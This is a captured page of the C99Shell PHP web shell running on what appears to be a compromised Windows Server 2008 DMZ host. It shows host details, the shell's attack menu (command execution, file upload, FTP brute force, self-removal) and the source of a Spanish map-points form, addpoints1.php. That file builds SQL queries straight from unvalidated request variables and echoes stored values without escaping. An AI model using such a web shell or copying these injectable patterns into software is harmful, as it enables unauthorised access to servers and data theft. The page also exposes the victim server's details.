!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addpoints1.php (4.68 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$axn 
= isset($acc);
        if (
$axn == true) {
            if (
$acc == 0) {
            require(
'conexion.php');
            
$query ="INSERT INTO puntos VALUES('','$nom','$des','$lin',$x,$y,2)";
            
$result mysql_query($query,$db);
            }
            if (
$acc == 1) {
            require(
'conexion.php');
            
$query ="DELETE FROM puntos WHERE id=$id";
            
$result mysql_query($query,$db);
            }
        }
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Puntos provisionales</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="2">
  <tr> 
    <td width="30%">&nbsp;</td>
    <td width="40%" bgcolor="#FFFFCC"> 
      <div align="center"><font size="3" face="Verdana, Arial, Helvetica, sans-serif"><strong>Forma 
        provisional para <br>
        carga de puntos de prueba</strong></font></div></td>
    <td width="30%">&nbsp;</td>
  </tr>
  <tr> 
    <td width="30%">&nbsp;</td>
    <td width="40%"><form name="form1" method="post" action="">
        <table width="100%" border="0" cellspacing="0" cellpadding="2">
          <tr> 
            <td width="50%"><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Nombre:</font></div></td>
            <td width="50%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="nom" type="text" id="nom">
              </font></td>
          </tr>
          <tr> 
            <td><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Link:</font></div></td>
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="lin" type="text" id="lin" value="http://">
              </font></td>
          </tr>
          <tr> 
            <td width="50%"><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">X: 
                <input name="x" type="text" id="x" size="10">
                </font></div></td>
            <td width="50%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Y: 
              <input name="y" type="text" id="y" size="10">
              </font></td>
          </tr>
          <tr> 
            <td width="50%"><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Descripci&oacute;n:</font></div></td>
            <td width="50%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">&nbsp;</font></td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> <font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                <textarea name="des" cols="50" id="des"></textarea>
                </font></div></td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> <font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                <input type="submit" name="Submit" value="Guardar">
                <input name="acc" type="hidden" id="acc" value="0">
                </font></div></td>
          </tr>
        </table>
      </form>
      <font size="2" face="Verdana, Arial, Helvetica, sans-serif">&nbsp;</font></td>
    <td width="30%">&nbsp;</td>
  </tr>
  <tr> 
    <td width="30%">&nbsp;</td>
    <td width="40%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">SIA-DAMA 
        / SIG / WEB<br>
        <strong>2004 </strong></font></div></td>
    <td width="30%">&nbsp;</td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
    <td bgcolor="#DFEDFF">
<div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Reporte 
        de Puntos Ingresados:</strong></font></div></td>
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
    <td> 
      <?php          require('conexion.php');
                    
$consul "SELECT *
                    FROM puntos"
                    
" order by id";
                    
$result mysql_query($consul,$db);
                    
$num_filas mysql_num_rows($result);
                    while (
$myrow mysql_fetch_array($result))
                    {
                    
$rid $myrow["id"];
                    
$rnom $myrow["nombre"];
                    
$rdes $myrow["descripcion"];
                    
$rlin $myrow["link"];
                    
$rx $myrow["x"];
                    
$ry $myrow["y"];
                    
?>
                  <font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><?php echo $rid?>.</strong> 
                  <a href="<?php echo $rlin?>"><?php echo $rnom?></a>, <font color="#0000FF">X:</font> <?php echo $rx?> <font color="#FF0000">Y:</font> 
                  <?php echo $ry?></font> (<a href="reqaddpoints.php?acc=1&id=<?php echo $rid?>">B</a>)<br>
                      <?php ?>
      </td>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--